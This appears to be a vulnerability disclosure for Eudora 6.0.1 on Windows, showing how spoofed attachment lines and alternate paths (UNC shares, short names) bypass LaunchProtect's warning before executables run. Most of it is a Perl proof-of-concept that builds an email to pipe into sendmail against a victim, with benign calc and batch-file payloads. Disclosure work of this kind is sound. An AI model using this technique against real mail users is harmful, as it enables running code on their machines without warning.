Eudora 6.0.1 (on Windows) has LaunchProtect, to warn the user before running executable attachments. However this only works in the attach folder; using spoofed attachments, executables stored elsewhere may run without warning. In some setups, even executables in the attach folder may run without warning. Harmless demo below. Cheers, Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia --- #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print " Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach directory only, and allows spoofed attachments pointing to an executable stored elsewhere to run without warning:\n"; print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n"; print "Attachment Converted\r: c:/winnt/system32/calc\n"; $X = 'README'; $Y = "$X.bat"; print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or) after some blurb so is scrolled off in another screenful, also send $Y. Clicking on $X does not get it any more (but gets $Y, with a LauchProtect warning):\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; print " Can be exploited if there is more than one way into attach: in my setup H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n"; print "These elicit warnings:\n"; print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme</a>\n"; print "Attachment Converted\r: h:/eudora/attach/README\n"; print "while these do the bad thing without warning:\n"; print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n"; print "Attachment Converted\r: //rome/home/eudora/attach/README\n"; print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n"; print " For the default setup, Eudora knows that C:\\Program Files and C:\\Progra~1 are the same thing...\n"; print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n"; print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n"; print "\n";
